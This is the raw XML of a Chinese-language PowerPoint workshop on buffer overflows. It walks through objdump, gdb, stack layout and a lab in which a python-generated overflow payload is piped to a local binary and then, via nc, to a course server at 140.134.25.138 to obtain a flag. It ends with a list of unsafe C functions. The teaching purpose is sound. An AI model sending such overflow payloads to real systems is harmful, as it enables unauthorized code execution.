            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7139976" y="2482152"/>
            <a:ext cx="1908267" cy="11642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aaaaaaaaaaaaaaaaaaaaaaaaaa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0" name="正方形/長方形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA13B570-4E46-D844-A24F-91AF37AA59BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9591881" y="4117749"/>
            <a:ext cx="1908267" cy="1160388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Return</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US"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ja-JP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Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x08]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59933D03-B23F-4D41-9720-C3EFAD52DEF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9606399" y="2373772"/>
            <a:ext cx="1908267" cy="1187791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Char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW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kumimoji="1" lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x20]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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2" name="正方形/長方形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF505633-DC6D-844B-8FA8-90D0288EC16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9606399" y="3623461"/>
            <a:ext cx="1908267" cy="432390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2267D"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F22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Saved BP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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[0x08]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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13" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB8C124-ED2D-6B4B-A849-E40008122D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8861877" y="5057646"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3003D54C-5E88-6C48-8A5A-25314CB42874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8885898" y="3848918"/>
            <a:ext cx="638710" cy="12838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線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41525F32-080C-5649-B349-BF7B5CF17CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8925084" y="3341595"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line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6119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C5464-6E6D-BB4B-A873-1E514EA9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建構完成 用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和排管送過去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7DDFF0-4E1B-364B-9CFF-44E93DF47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r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>python -c "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>('a'*0x28+’\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x00\x00\x00\x00\x00')" -| </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>./lab3.out</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3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75CEEB5-EE3C-544F-A63F-8458C2930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68" y="3540414"/>
            <a:ext cx="9486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17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F67E17-7514-DE4E-B879-694C4E5AC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成功後 換去伺服器拿</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>吧</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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BCEAFFCA-762C-EB45-B1F4-9C8B98DB1E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1488613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fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>python -c “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>(‘a’*0x28+’\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="fr" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>\x00\x00\x00\x00\x00‘)” -| </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>nc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140.134.25.138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10023</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="fr" altLang="zh-TW" sz="32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D4B573A-B6E9-D940-A53A-CBC3F865C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19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138959" y="3428999"/>
            <a:ext cx="9359900" cy="97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684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4C3C8F-EA3E-684D-9CA9-A8D4C83C0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哪些函數比較安全？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636878-E689-174E-8D41-1D5F64265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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>安全：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(“%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>d”,&amp;a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>不安全：</a:t>
            </a:r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en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 錯誤設定範圍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(a)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>注意這寫法不安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> （</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>formet</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>gets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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0728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0CEB48-FAF5-514B-B665-301154B5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objdump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8948EE-C5CF-114A-98DD-ECD00D42F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4287"/>
            <a:ext cx="8596668" cy="3880773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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>object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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的資訊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檔頭、區段、內容、符號表等資訊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Object code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>常被稱作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binaries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二進位檔案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/>
              <a:t>最常使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>–d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  反組譯程式段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-TW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1CF80F6-8858-684C-A001-16DEDC095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4475" y="239011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FFC0889-C08F-4743-AEC2-C0E8BE009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849833"/>
            <a:ext cx="8680414" cy="503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07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B7314-CF30-904D-9520-EAE852ED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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>–d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>後的程式區段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A2E87A8-7286-2040-A6BD-0F8F5A8CE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016" y="3429000"/>
            <a:ext cx="8204200" cy="3429000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284F0E6-8B54-E64F-BF60-3B071A1FA458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1515647"/>
            <a:ext cx="9933139" cy="168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400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>通常 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>開頭</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 和一些常用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>都是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>編譯時自動生成</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>裡面包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的基礎運行等等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2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+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>所以真正自己產的應該只有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>&lt;main&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>區段</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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81804662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2190</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>699</Paragraphs>
  <Slides>79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79</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="92" baseType="lpstr">
      <vt:lpstr>Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>方正姚体</vt:lpstr>
      <vt:lpstr>HelveticaNeue</vt:lpstr>
      <vt:lpstr>HGP創英角ｺﾞｼｯｸUB</vt:lpstr>
      <vt:lpstr>Kaiti TC</vt:lpstr>
      <vt:lpstr>SimHei</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>多面向</vt:lpstr>
      <vt:lpstr>Buffer Overflow </vt:lpstr>
      <vt:lpstr>如何寫一個安全程式</vt:lpstr>
      <vt:lpstr>今天上課檔案</vt:lpstr>
      <vt:lpstr>GCC</vt:lpstr>
      <vt:lpstr>請先安裝</vt:lpstr>
      <vt:lpstr>gcc (GNU C Compiler) C語言編譯器 ./[FILE] 執行指定路徑檔案 </vt:lpstr>
      <vt:lpstr>Objdump</vt:lpstr>
      <vt:lpstr>objdump</vt:lpstr>
      <vt:lpstr>objdump –d 後的程式區段</vt:lpstr>
      <vt:lpstr>Objdump 其他參數</vt:lpstr>
      <vt:lpstr>GDB</vt:lpstr>
      <vt:lpstr>先把gdb 升級成gdb-peda</vt:lpstr>
      <vt:lpstr>環境設置</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>gdb (GNU Debugger) </vt:lpstr>
      <vt:lpstr>gdb常用指令</vt:lpstr>
      <vt:lpstr>Gdb 「x」指令</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Lab1 使用objdump與gdb jump 找出findflag.out 的flag</vt:lpstr>
      <vt:lpstr>首先 objdump ./findflag.out -d 看到一個奇怪的function名稱</vt:lpstr>
      <vt:lpstr>使用gdb打開</vt:lpstr>
      <vt:lpstr>隨便設定一個中斷點 b main</vt:lpstr>
      <vt:lpstr>Run 讓他到中斷點停止</vt:lpstr>
      <vt:lpstr>jump 到 fun 那個奇怪的 function</vt:lpstr>
      <vt:lpstr>Lab2</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>gdb -q lab2.out </vt:lpstr>
      <vt:lpstr>disassemble main disassemble func </vt:lpstr>
      <vt:lpstr>組合語言 (x86)</vt:lpstr>
      <vt:lpstr>組合語言 (x86)</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>暫存器（Register） </vt:lpstr>
      <vt:lpstr>組合語言</vt:lpstr>
      <vt:lpstr>Stack  由高address往低address長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Lab2 觀察子程式呼叫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Lab3 overflow </vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>那麼如果我把return address 蓋成想要的位子呢？</vt:lpstr>
      <vt:lpstr>沒人呼叫的eval()</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>objdump -d ./lab3.out  </vt:lpstr>
      <vt:lpstr>因 x86 底下是 little-endian 的 所以填入 address 時，需要反過來來填入 </vt:lpstr>
      <vt:lpstr>建構完成 用python和排管送過去</vt:lpstr>
      <vt:lpstr>成功後 換去伺服器拿flag吧</vt:lpstr>
      <vt:lpstr>哪些函數比較安全？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</dc:title>
  <dc:creator>童舒晧</dc:creator>
  <cp:lastModifiedBy>童 童</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-22T08:27:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-08T11:24:45Z</dcterms:modified>
</cp:coreProperties>
</file>